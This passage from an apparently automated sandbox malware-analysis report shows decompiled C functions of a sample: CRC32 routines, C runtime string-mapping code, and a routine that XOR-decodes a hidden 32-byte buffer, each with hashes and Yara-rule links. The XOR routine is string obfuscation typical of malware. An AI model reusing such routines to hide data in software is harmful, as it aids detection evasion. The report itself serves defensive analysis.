4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x18) * 4) ^  *(0x41beb0 + (_t205 & 0x000000ff) * 4) ^  *(_t181 - 8)) >> 0x18) * 4) ^  *(0x41beb0 + (_t110 & 0x000000ff) * 4) ^  *(_t181 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t214 >> 0x18) * 4) ^  *(0x41beb0 + (_t214 & 0x000000ff) * 4) ^  *(_t182 - 4);
						_t175 = _t182 + 4;
						_t239 = _t239 - 0x20;
						_t87 =  *(0x41b6b0 + (( *(0x41b6b0 + (_t119 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (_t119 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t119 >> 0x18) * 4) ^  *(0x41beb0 + (_t119 & 0x000000ff) * 4) ^  *(_t175 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (_t119 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (_t119 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t119 >> 0x18) * 4) ^  *(0x41beb0 + (_t119 & 0x000000ff) * 4) ^  *(_t175 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (( *(0x41b6b0 + (_t119 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (_t119 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t119 >> 0x18) * 4) ^  *(0x41beb0 + (_t119 & 0x000000ff) * 4) ^  *(_t175 - 4)) >> 0x18) * 4) ^  *(0x41beb0 + (_t223 & 0x000000ff) * 4);
						_t238 = _t238 - 1;
					} while (_t238 != 0);
				}
				if(_t239 >= 4) {
					_t188 = _t239 >> 2;
					do {
						_t90 = _t87 ^  *_t175;
						_t175 = _t175 + 4;
						_t239 = _t239 - 4;
						_t188 = _t188 - 1;
						_t87 =  *(0x41b6b0 + (_t90 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (_t90 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t90 >> 0x18) * 4) ^  *(0x41beb0 + (_t90 & 0x000000ff) * 4);
					} while (_t188 != 0);
				}
				if(_t239 != 0) {
					do {
						_t87 = _t87 >> 0x00000008 ^  *(0x41b2b0 + (( *_t175 & 0x000000ff ^ _t87) & 0x000000ff) * 4);
						_t175 = _t175 + 1;
						_t239 = _t239 - 1;
					} while (_t239 != 0);
				}
				return  !_t87;
			}














                                                                                                                                                  0x004028b0
                                                                                                                                                  0x004028b1
                                                                                                                                                  0x004028b3
                                                                                                                                                  0x004028b7
                                                                                                                                                  0x004028c0
                                                                                                                                                  0x004028d3
                                                                                                                                                  0x004028da
                                                                                                                                                  0x004028db
                                                                                                                                                  0x004028de
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004028de
                                                                                                                                                  0x004028c0
                                                                                                                                                  0x004028e0
                                                                                                                                                  0x004028e5
                                                                                                                                                  0x004028ed
                                                                                                                                                  0x004028f0
                                                                                                                                                  0x004028f0
                                                                                                                                                  0x00402931
                                                                                                                                                  0x00402934
                                                                                                                                                  0x00402976
                                                                                                                                                  0x00402979
                                                                                                                                                  0x004029bb
                                                                                                                                                  0x00402a3c
                                                                                                                                                  0x00402a7b
                                                                                                                                                  0x00402a7e
                                                                                                                                                  0x00402a81
                                                                                                                                                  0x00402ac0
                                                                                                                                                  0x00402afb
                                                                                                                                                  0x00402b02
                                                                                                                                                  0x00402b02
                                                                                                                                                  0x004028f0
                                                                                                                                                  0x00402b0e
                                                                                                                                                  0x00402b12
                                                                                                                                                  0x00402b15
                                                                                                                                                  0x00402b15
                                                                                                                                                  0x00402b17
                                                                                                                                                  0x00402b56
                                                                                                                                                  0x00402b59
                                                                                                                                                  0x00402b5c
                                                                                                                                                  0x00402b5c
                                                                                                                                                  0x00402b15
                                                                                                                                                  0x00402b64
                                                                                                                                                  0x00402b70
                                                                                                                                                  0x00402b7e
                                                                                                                                                  0x00402b85
                                                                                                                                                  0x00402b86
                                                                                                                                                  0x00402b86
                                                                                                                                                  0x00402b70
                                                                                                                                                  0x00402b8e

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927182410.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.927267311.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.927294895.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 56d4400f77c04dc4446d24fbb084ed78fa0beaad766ef6ff58d44a670f1be69a
                                                                                                                                                  • Instruction ID: e93c334361593eb17f37b37ed9e80cdb2c00b1b1e1af3e0e9a736190e966ddef
                                                                                                                                                  • Opcode Fuzzy Hash: 56d4400f77c04dc4446d24fbb084ed78fa0beaad766ef6ff58d44a670f1be69a
                                                                                                                                                  • Instruction Fuzzy Hash: 4A615E3266055747E391DF6DEEC47663762EBC9351F18C630CA008B6A6CB39B92297CC
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00401650, Relevance: .1, Instructions: 111COMMONCrypto
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00401650(signed char* _a4, intOrPtr _a8) {
				char _v4;
				signed char _v5;
				signed char _v6;
				signed char _v7;
				signed char _v8;
				signed char _v9;
				signed char _v10;
				signed char _v11;
				signed char _v12;
				signed char _v13;
				signed char _v14;
				signed char _v15;
				signed char _v16;
				signed char _v17;
				signed char _v18;
				signed char _v19;
				signed char _v20;
				signed char _v21;
				signed char _v22;
				signed char _v23;
				signed char _v24;
				signed char _v25;
				signed char _v26;
				signed char _v27;
				signed char _v28;
				signed char _v29;
				signed char _v30;
				signed char _v31;
				signed char _v32;
				signed char _v33;
				signed char _v34;
				signed char _v35;
				signed char _v36;
				void* __esi;
				signed char* _t68;
				intOrPtr _t72;
				void* _t137;
				intOrPtr _t138;

				_t68 = _a4;
				_v36 =  *_t68 & 0x000000ff ^ 0x000000a3;
				_v35 = _t68[1] & 0x000000ff ^ 0x00000054;
				_v34 =  !(_t68[2] & 0x000000ff);
				_v33 = _t68[3] & 0x000000ff ^ 0x00000075;
				_v32 = _t68[4] & 0x000000ff ^ 0x000000e7;
				_v31 = _t68[5] & 0x000000ff ^ 0x00000044;
				_v30 = _t68[6] & 0x000000ff ^ 0x0000004b;
				_v29 = _t68[7] & 0x000000ff ^ 0x00000023;
				_v28 = _t68[8] & 0x000000ff ^ 0x000000bf;
				_v27 = _t68[9] & 0x000000ff ^ 0x00000045;
				_v26 = _t68[0xa] & 0x000000ff ^ 0x0000003b;
				_v25 = _t68[0xb] & 0x000000ff ^ 0x00000056;
				_v24 = _t68[0xc] & 0x000000ff ^ 0x000000f8;
				_v23 = _t68[0xd] & 0x000000ff ^ 0x00000098;
				_v22 = _t68[0xe] & 0x000000ff ^ 0x0000005b;
				_v21 = _t68[0xf] & 0x000000ff ^ 0x000000f4;
				_v20 = _t68[0x10] & 0x000000ff ^ 0x000000b5;
				_v19 = _t68[0x11] & 0x000000ff ^ 0x00000087;
				_v18 = _t68[0x12] & 0x000000ff ^ 0x0000007b;
				_v17 = _t68[0x13] & 0x000000ff ^ 0x0000000f;
				_v16 = _t68[0x14] & 0x000000ff ^ 0x000000f4;
				_v15 = _t68[0x15] & 0x000000ff ^ 0x00000076;
				_v14 = _t68[0x16] & 0x000000ff ^ 0x000000b9;
				_v13 = _t68[0x17] & 0x000000ff ^ 0x00000034;
				_v12 = _t68[0x18] & 0x000000ff ^ 0x000000bf;
				_v11 = _t68[0x19] & 0x000000ff ^ 0x0000001e;
				_t138 = _a8;
				_v10 = _t68[0x1a] & 0x000000ff ^ 0x000000e7;
				_v9 = _t68[0x1b] & 0x000000ff ^ 0x00000078;
				_v8 = _t68[0x1c] & 0x000000ff ^ 0x00000098;
				_v7 = _t68[0x1d] & 0x000000ff ^ 0x000000e9;
				_v6 = _t68[0x1e] & 0x000000ff ^ 0x0000006f;
				_v5 = _t68[0x1f] & 0x000000ff ^ 0x000000b4;
				_v4 = 0;
				E0040B350(_t72, _t137, _t138, _t138,  &_v36, 0x20);
				return _t138;
			}









































                                                                                                                                                  0x00401654
                                                                                                                                                  0x00401665
                                                                                                                                                  0x0040166d
                                                                                                                                                  0x0040167a
                                                                                                                                                  0x00401682
                                                                                                                                                  0x00401690
                                                                                                                                                  0x00401698
                                                                                                                                                  0x004016a6
                                                                                                                                                  0x004016ae
                                                                                                                                                  0x004016bc
                                                                                                                                                  0x004016c4
                                                                                                                                                  0x004016d2
                                                                                                                                                  0x004016da
                                                                                                                                                  0x004016e8
                                                                                                                                                  0x004016f0
                                                                                                                                                  0x004016fe
                                                                                                                                                  0x00401706
                                                                                                                                                  0x00401714
                                                                                                                                                  0x0040171c
                                                                                                                                                  0x0040172a
                                                                                                                                                  0x00401732
                                                                                                                                                  0x00401740
                                                                                                                                                  0x00401748
                                                                                                                                                  0x00401756
                                                                                                                                                  0x0040175e
                                                                                                                                                  0x0040176c
                                                                                                                                                  0x00401774
                                                                                                                                                  0x0040177c
                                                                                                                                                  0x00401786
                                                                                                                                                  0x0040178e
                                                                                                                                                  0x0040179c
                                                                                                                                                  0x004017a4
                                                                                                                                                  0x004017ba
                                                                                                                                                  0x004017be
                                                                                                                                                  0x004017c2
                                                                                                                                                  0x004017c7
                                                                                                                                                  0x004017d5

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927182410.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.927267311.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.927294895.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: f84f8abda09efbfc4fc50908dec446613bf2f52d635c093d4d9c5e236f650133
                                                                                                                                                  • Instruction ID: 39afabd8a370e1aacf823bb5b0eb141e0e266d105c364ee31248ba7b153c19f0
                                                                                                                                                  • Opcode Fuzzy Hash: f84f8abda09efbfc4fc50908dec446613bf2f52d635c093d4d9c5e236f650133
                                                                                                                                                  • Instruction Fuzzy Hash: 2851F94400D7E18EC716873A44E0AA7BFD10FAB115F4E9ACDA5E90B2E3C159C288DB77
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00402F20, Relevance: .1, Instructions: 103COMMONCrypto
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00402F20(signed int _a4, signed int _a8, signed int _a12) {
				char _v128;
				char _v256;
				void* __ebx;
				signed int _t37;
				signed int _t42;
				signed int _t43;
				signed int _t48;
				signed int _t49;
				signed int _t52;
				signed int _t53;
				signed int _t54;
				signed int* _t55;
				signed int* _t56;
				signed int* _t57;
				signed int* _t58;
				signed int _t59;
				signed int _t60;
				void* _t62;
				void* _t64;
				signed int _t66;
				signed int _t68;
				void* _t69;

				_t69 =  &_v256;
				if(_a12 != 0) {
					_t52 = 1;
					_v256 = 0xedb88320;
					_t37 = 1;
					do {
						 *(_t69 + _t37 * 4) = _t52;
						_t37 = _t37 + 1;
						_t52 = _t52 + _t52;
						__eflags = _t37 - 0x20;
					} while (_t37 < 0x20);
					E00402EE0( &_v128,  &_v256);
					E00402EE0( &_v256,  &_v128);
					_t42 = _a4;
					do {
						_t62 = 0;
						do {
							_t53 =  *(_t69 + _t62 + 0xc);
							_t66 = 0;
							_t57 =  &_v256;
							__eflags = _t53;
							while(_t53 != 0) {
								__eflags = _t53 & 0x00000001;
								if((_t53 & 0x00000001) != 0) {
									_t66 = _t66 ^  *_t57;
									__eflags = _t66;
								}
								_t53 = _t53 >> 1;
								_t57 =  &(_t57[1]);
								__eflags = _t53;
							}
							 *(_t69 + _t62 + 0x8c) = _t66;
							_t62 = _t62 + 4;
							__eflags = _t62 - 0x80;
						} while (_t62 < 0x80);
						_t48 = _a12;
						__eflags = _t48 & 0x00000001;
						if(__eflags != 0) {
							_t60 = 0;
							_t56 =  &_v128;
							__eflags = _t42;
							while(__eflags != 0) {
								__eflags = _t42 & 0x00000001;
								if((_t42 & 0x00000001) != 0) {
									_t60 = _t60 ^  *_t56;
									__eflags = _t60;
								}
								_t42 = _t42 >> 1;
								_t56 =  &(_t56[1]);
								__eflags = _t42;
							}
							_t42 = _t60;
						}
						_t49 = _t48 >> 1;
						if(__eflags != 0) {
							_t64 = 0;
							do {
								_t54 =  *(_t69 + _t64 + 0x8c);
								_t68 = 0;
								_t58 =  &_v128;
								__eflags = _t54;
								while(_t54 != 0) {
									__eflags = _t54 & 0x00000001;
									if((_t54 & 0x00000001) != 0) {
										_t68 = _t68 ^  *_t58;
										__eflags = _t68;
									}
									_t54 = _t54 >> 1;
									_t58 =  &(_t58[1]);
									__eflags = _t54;
								}
								 *(_t69 + _t64 + 0xc) = _t68;
								_t64 = _t64 + 4;
								__eflags = _t64 - 0x80;
							} while (_t64 < 0x80);
							__eflags = _t49 & 0x00000001;
							if(__eflags != 0) {
								_t59 = 0;
								_t55 =  &_v256;
								__eflags = _t42;
								while(__eflags != 0) {
									__eflags = _t42 & 0x00000001;
									if((_t42 & 0x00000001) != 0) {
										_t59 = _t59 ^  *_t55;
										__eflags = _t59;
									}
									_t42 = _t42 >> 1;
									_t55 =  &(_t55[1]);
									__eflags = _t42;
								}
								_t42 = _t59;
							}
							goto L32;
						}
						break;
						L32:
						_a12 = _t49 >> 1;
					} while (__eflags != 0);
					_t43 = _t42 ^ _a8;
					__eflags = _t43;
					return _t43;
				} else {
					return _a4;
				}
			}

























                                                                                                                                                  0x00402f20
                                                                                                                                                  0x00402f2e
                                                                                                                                                  0x00402f3e
                                                                                                                                                  0x00402f43
                                                                                                                                                  0x00402f4a
                                                                                                                                                  0x00402f50
                                                                                                                                                  0x00402f50
                                                                                                                                                  0x00402f53
                                                                                                                                                  0x00402f54
                                                                                                                                                  0x00402f56
                                                                                                                                                  0x00402f56
                                                                                                                                                  0x00402f69
                                                                                                                                                  0x00402f79
                                                                                                                                                  0x00402f7e
                                                                                                                                                  0x00402f85
                                                                                                                                                  0x00402f85
                                                                                                                                                  0x00402f90
                                                                                                                                                  0x00402f90
                                                                                                                                                  0x00402f94
                                                                                                                                                  0x00402f96
                                                                                                                                                  0x00402f9a
                                                                                                                                                  0x00402f9c
                                                                                                                                                  0x00402fa0
                                                                                                                                                  0x00402fa3
                                                                                                                                                  0x00402fa5
                                                                                                                                                  0x00402fa5
                                                                                                                                                  0x00402fa5
                                                                                                                                                  0x00402fa7
                                                                                                                                                  0x00402fa9
                                                                                                                                                  0x00402fac
                                                                                                                                                  0x00402fac
                                                                                                                                                  0x00402fb0
                                                                                                                                                  0x00402fb7
                                                                                                                                                  0x00402fba
                                                                                                                                                  0x00402fba
                                                                                                                                                  0x00402fc2
                                                                                                                                                  0x00402fc9
                                                                                                                                                  0x00402fcc
                                                                                                                                                  0x00402fce
                                                                                                                                                  0x00402fd0
                                                                                                                                                  0x00402fd7
                                                                                                                                                  0x00402fd9
                                                                                                                                                  0x00402fe0
                                                                                                                                                  0x00402fe2
                                                                                                                                                  0x00402fe4
                                                                                                                                                  0x00402fe4
                                                                                                                                                  0x00402fe4
                                                                                                                                                  0x00402fe6
                                                                                                                                                  0x00402fe8
                                                                                                                                                  0x00402feb
                                                                                                                                                  0x00402feb
                                                                                                                                                  0x00402fef
                                                                                                                                                  0x00402fef
                                                                                                                                                  0x00402ff1
                                                                                                                                                  0x00402ff3
                                                                                                                                                  0x00402ff5
                                                                                                                                                  0x00403000
                                                                                                                                                  0x00403000
                                                                                                                                                  0x00403007
                                                                                                                                                  0x00403009
                                                                                                                                                  0x00403010
                                                                                                                                                  0x00403012
                                                                                                                                                  0x00403014
                                                                                                                                                  0x00403017
                                                                                                                                                  0x00403019
                                                                                                                                                  0x00403019
                                                                                                                                                  0x00403019
                                                                                                                                                  0x0040301b
                                                                                                                                                  0x0040301d
                                                                                                                                                  0x00403020
                                                                                                                                                  0x00403020
                                                                                                                                                  0x00403024
                                                                                                                                                  0x00403028
                                                                                                                                                  0x0040302b
                                                                                                                                                  0x0040302b
                                                                                                                                                  0x00403033
                                                                                                                                                  0x00403036
                                                                                                                                                  0x00403038
                                                                                                                                                  0x0040303a
                                                                                                                                                  0x0040303e
                                                                                                                                                  0x00403040
                                                                                                                                                  0x00403042
                                                                                                                                                  0x00403044
                                                                                                                                                  0x00403046
                                                                                                                                                  0x00403046
                                                                                                                                                  0x00403046
                                                                                                                                                  0x00403048
                                                                                                                                                  0x0040304a
                                                                                                                                                  0x0040304d
                                                                                                                                                  0x0040304d
                                                                                                                                                  0x00403051
                                                                                                                                                  0x00403051
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403036
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403053
                                                                                                                                                  0x00403055
                                                                                                                                                  0x00403055
                                                                                                                                                  0x00403062
                                                                                                                                                  0x00403062
                                                                                                                                                  0x00403072
                                                                                                                                                  0x00402f30
                                                                                                                                                  0x00402f3d
                                                                                                                                                  0x00402f3d

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927182410.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.927267311.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.927294895.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5804b07f674ae3d268ec1438c7da71b35f3107e62f64f1f633515dfb68ee091a
                                                                                                                                                  • Instruction ID: cff114a85fcb8f5deb46d81d22c4208fa3965af46b01a687ebeadebabb5a60ab
                                                                                                                                                  • Opcode Fuzzy Hash: 5804b07f674ae3d268ec1438c7da71b35f3107e62f64f1f633515dfb68ee091a
                                                                                                                                                  • Instruction Fuzzy Hash: 9A31D8302052028BE738CE19C954BEBB3B5AFC0349F44883ED986A73C4DABDD945D795
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00402F89, Relevance: .1, Instructions: 77COMMONCrypto
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00402F89(signed int __eax, void* __edi, char _a12, char _a140, signed int _a276, signed int _a280) {
				signed int _t28;
				signed int _t30;
				signed int _t31;
				unsigned int _t34;
				unsigned int _t35;
				signed int* _t36;
				signed int* _t37;
				signed int* _t38;
				signed int* _t39;
				signed int _t40;
				signed int _t41;
				void* _t43;
				void* _t45;
				signed int _t46;
				signed int _t48;
				void* _t49;
				signed int _t60;
				signed int _t70;

				_t28 = __eax;
				while(1) {
					_t34 =  *(_t49 + _t43 + 0xc);
					_t46 = 0;
					_t38 =  &_a12;
					if(_t34 != 0) {
					}
					L3:
					do {
						if((_t34 & 0x00000001) != 0) {
							_t46 = _t46 ^  *_t38;
						}
						_t34 = _t34 >> 1;
						_t38 =  &(_t38[1]);
					} while (_t34 != 0);
					L7:
					 *(_t49 + _t43 + 0x8c) = _t46;
					_t43 = _t43 + 4;
					if(_t43 < 0x80) {
						do {
							_t34 =  *(_t49 + _t43 + 0xc);
							_t46 = 0;
							_t38 =  &_a12;
							if(_t34 != 0) {
							}
							goto L7;
						} while (_t43 < 0x80);
					}
					_t30 = _a280;
					if((_t30 & 0x00000001) != 0) {
						_t41 = 0;
						_t37 =  &_a140;
						if(_t28 != 0) {
							do {
								if((_t28 & 0x00000001) != 0) {
									_t41 = _t41 ^  *_t37;
								}
								_t28 = _t28 >> 1;
								_t37 =  &(_t37[1]);
								_t60 = _t28;
							} while (_t60 != 0);
						}
						_t28 = _t41;
					}
					_t31 = _t30 >> 1;
					if(_t60 != 0) {
						_t45 = 0;
						do {
							_t35 =  *(_t49 + _t45 + 0x8c);
							_t48 = 0;
							_t39 =  &_a140;
							while(_t35 != 0) {
								if((_t35 & 0x00000001) != 0) {
									_t48 = _t48 ^  *_t39;
								}
								_t35 = _t35 >> 1;
								_t39 =  &(_t39[1]);
							}
							 *(_t49 + _t45 + 0xc) = _t48;
							_t45 = _t45 + 4;
						} while (_t45 < 0x80);
						if((_t31 & 0x00000001) != 0) {
							_t40 = 0;
							_t36 =  &_a12;
							if(_t28 != 0) {
								do {
									if((_t28 & 0x00000001) != 0) {
										_t40 = _t40 ^  *_t36;
									}
									_t28 = _t28 >> 1;
									_t36 =  &(_t36[1]);
									_t70 = _t28;
								} while (_t70 != 0);
							}
							_t28 = _t40;
						}
						_a280 = _t31 >> 1;
						if(_t70 != 0) {
							_t43 = 0;
							continue;
						}
					}
					return _t28 ^ _a276;
				}
			}





















                                                                                                                                                  0x00402f89
                                                                                                                                                  0x00402f90
                                                                                                                                                  0x00402f90
                                                                                                                                                  0x00402f94
                                                                                                                                                  0x00402f96
                                                                                                                                                  0x00402f9c
                                                                                                                                                  0x00402f9c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00402fa0
                                                                                                                                                  0x00402fa3
                                                                                                                                                  0x00402fa5
                                                                                                                                                  0x00402fa5
                                                                                                                                                  0x00402fa7
                                                                                                                                                  0x00402fa9
                                                                                                                                                  0x00402fac
                                                                                                                                                  0x00402fb0
                                                                                                                                                  0x00402fb0
                                                                                                                                                  0x00402fb7
                                                                                                                                                  0x00402fc0
                                                                                                                                                  0x00402f90
                                                                                                                                                  0x00402f90
                                                                                                                                                  0x00402f94
                                                                                                                                                  0x00402f96
                                                                                                                                                  0x00402f9c
                                                                                                                                                  0x00402f9c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00402f9c
                                                                                                                                                  0x00402f90
                                                                                                                                                  0x00402fc2
                                                                                                                                                  0x00402fcc
                                                                                                                                                  0x00402fce
                                                                                                                                                  0x00402fd0
                                                                                                                                                  0x00402fd9
                                                                                                                                                  0x00402fe0
                                                                                                                                                  0x00402fe2
                                                                                                                                                  0x00402fe4
                                                                                                                                                  0x00402fe4
                                                                                                                                                  0x00402fe6
                                                                                                                                                  0x00402fe8
                                                                                                                                                  0x00402feb
                                                                                                                                                  0x00402feb
                                                                                                                                                  0x00402fe0
                                                                                                                                                  0x00402fef
                                                                                                                                                  0x00402fef
                                                                                                                                                  0x00402ff1
                                                                                                                                                  0x00402ff3
                                                                                                                                                  0x00402ff5
                                                                                                                                                  0x00403000
                                                                                                                                                  0x00403000
                                                                                                                                                  0x00403007
                                                                                                                                                  0x00403009
                                                                                                                                                  0x00403012
                                                                                                                                                  0x00403017
                                                                                                                                                  0x00403019
                                                                                                                                                  0x00403019
                                                                                                                                                  0x0040301b
                                                                                                                                                  0x0040301d
                                                                                                                                                  0x00403020
                                                                                                                                                  0x00403024
                                                                                                                                                  0x00403028
                                                                                                                                                  0x0040302b
                                                                                                                                                  0x00403036
                                                                                                                                                  0x00403038
                                                                                                                                                  0x0040303a
                                                                                                                                                  0x00403040
                                                                                                                                                  0x00403042
                                                                                                                                                  0x00403044
                                                                                                                                                  0x00403046
                                                                                                                                                  0x00403046
                                                                                                                                                  0x00403048
                                                                                                                                                  0x0040304a
                                                                                                                                                  0x0040304d
                                                                                                                                                  0x0040304d
                                                                                                                                                  0x00403042
                                                                                                                                                  0x00403051
                                                                                                                                                  0x00403051
                                                                                                                                                  0x00403055
                                                                                                                                                  0x0040305c
                                                                                                                                                  0x00402f85
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00402f85
                                                                                                                                                  0x0040305c
                                                                                                                                                  0x00403072
                                                                                                                                                  0x00403072

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927182410.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.927267311.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.927294895.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9961543af999a1320c5b9d9b8c59a9b64f893fc8dbb42675723320a25693eab2
                                                                                                                                                  • Instruction ID: 40597224e526abc728bb10992f322fa75c91b34d76fbbe6bc80328d1c420bfc2
                                                                                                                                                  • Opcode Fuzzy Hash: 9961543af999a1320c5b9d9b8c59a9b64f893fc8dbb42675723320a25693eab2
                                                                                                                                                  • Instruction Fuzzy Hash: F321923170520247EB68C929C9547ABB3A5ABC0389F48853EC986A73C8DAB9E941D785
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00417081, Relevance: 31.8, APIs: 21, Instructions: 340COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                                  			E00417081(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
				signed int _v8;
				int _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				void* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t110;
				intOrPtr _t112;
				intOrPtr _t113;
				short* _t115;
				short* _t116;
				char* _t120;
				short* _t121;
				short* _t123;
				short* _t127;
				int _t128;
				short* _t141;
				signed int _t144;
				void* _t146;
				short* _t147;
				signed int _t150;
				short* _t153;
				char* _t157;
				int _t160;
				long _t162;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				int _t182;
				short* _t184;
				signed int _t186;
				signed int _t188;
				short* _t189;
				int _t191;
				intOrPtr _t194;
				int _t207;

				_t110 =  *0x422234; // 0x4fcd548
				_v8 = _t110 ^ _t188;
				_t184 = __ecx;
				_t194 =  *0x423e7c; // 0x1
				if(_t194 == 0) {
					_t182 = 1;
					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
						_t162 = GetLastError();
						__eflags = _t162 - 0x78;
						if(_t162 == 0x78) {
							 *0x423e7c = 2;
						}
					} else {
						 *0x423e7c = 1;
					}
				}
				if(_a16 <= 0) {
					L13:
					_t112 =  *0x423e7c; // 0x1
					if(_t112 == 2 || _t112 == 0) {
						_v16 = 0;
						_v20 = 0;
						__eflags = _a4;
						if(_a4 == 0) {
							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
						}
						__eflags = _a28;
						if(_a28 == 0) {
							_a28 =  *((intOrPtr*)( *_t184 + 4));
						}
						_t113 = E00417A20(0, _t179, _t182, _t184, _a4);
						_v24 = _t113;
						__eflags = _t113 - 0xffffffff;
						if(_t113 != 0xffffffff) {
							__eflags = _t113 - _a28;
							if(_t113 == _a28) {
								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
								L78:
								__eflags = _v16;
								if(__eflags != 0) {
									_push(_v16);
									E0040B6B5(0, _t182, _t184, __eflags);
								}
								_t115 = _v20;
								__eflags = _t115;
								if(_t115 != 0) {
									__eflags = _a20 - _t115;
									if(__eflags != 0) {
										_push(_t115);
										E0040B6B5(0, _t182, _t184, __eflags);
									}
								}
								_t116 = _t184;
								goto L84;
							}
							_t120 = E00417A69(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
							_t191 =  &(_t189[0xc]);
							_v16 = _t120;
							__eflags = _t120;
							if(_t120 == 0) {
								goto L58;
							}
							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
							_v12 = _t121;
							__eflags = _t121;
							if(__eflags != 0) {
								if(__eflags <= 0) {
									L71:
									_t182 = 0;
									__eflags = 0;
									L72:
									__eflags = _t182;
									if(_t182 == 0) {
										goto L62;
									}
									E0040BA30(_t182, _t182, 0, _v12);
									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
									_v12 = _t123;
									__eflags = _t123;
									if(_t123 != 0) {
										_t186 = E00417A69(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
										_v20 = _t186;
										asm("sbb esi, esi");
										_t184 =  ~_t186 & _v12;
										__eflags = _t184;
									} else {
										_t184 = 0;
									}
									E004147AE(_t182);
